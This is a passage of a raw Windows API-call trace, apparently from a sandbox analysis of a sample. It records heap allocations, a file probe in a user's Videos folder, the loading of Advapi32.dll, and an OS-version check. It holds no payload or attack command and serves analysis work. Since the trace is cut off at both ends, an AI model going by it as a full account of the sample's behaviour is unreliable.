Size=0x10) returned 0x2aaae88 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0213.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0213.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0213.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0213.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.649] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0213.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0213.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0213.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0213.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0213.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0213.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0213.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0213.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0213.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0213.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0213.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0213.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0213.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0213.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0213.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0213.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0213.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0213.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0213.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0213.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0213.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0213.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0213.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0213.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0213.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0213.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.653] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0213.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0213.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0213.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0213.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0213.653] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/qt2pH0rRBDAlo9_9_.avi", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239cade0, ftCreationTime.dwHighDateTime=0x1d5cdd0, ftLastAccessTime.dwLowDateTime=0xc7c16330, ftLastAccessTime.dwHighDateTime=0x1d5d289, ftLastWriteTime.dwLowDateTime=0xc7c16330, ftLastWriteTime.dwHighDateTime=0x1d5d289, nFileSizeHigh=0x0, nFileSizeLow=0x12697, dwReserved0=0x0, dwReserved1=0x0, cFileName="qt2pH0rRBDAlo9_9_.avi", cAlternateFileName="QT2PH0~1.AVI")) returned 0x9e21f8 [0213.654] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0213.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0213.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0213.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0213.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0213.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0213.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0213.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0213.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0213.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0213.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0213.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0213.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0213.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0213.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0213.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0213.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0213.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0213.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0213.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0213.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0213.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.655] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.655] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0213.656] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.656] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0213.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0213.657] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.658] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.658] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0213.658] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0213.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0213.658] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.658] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: 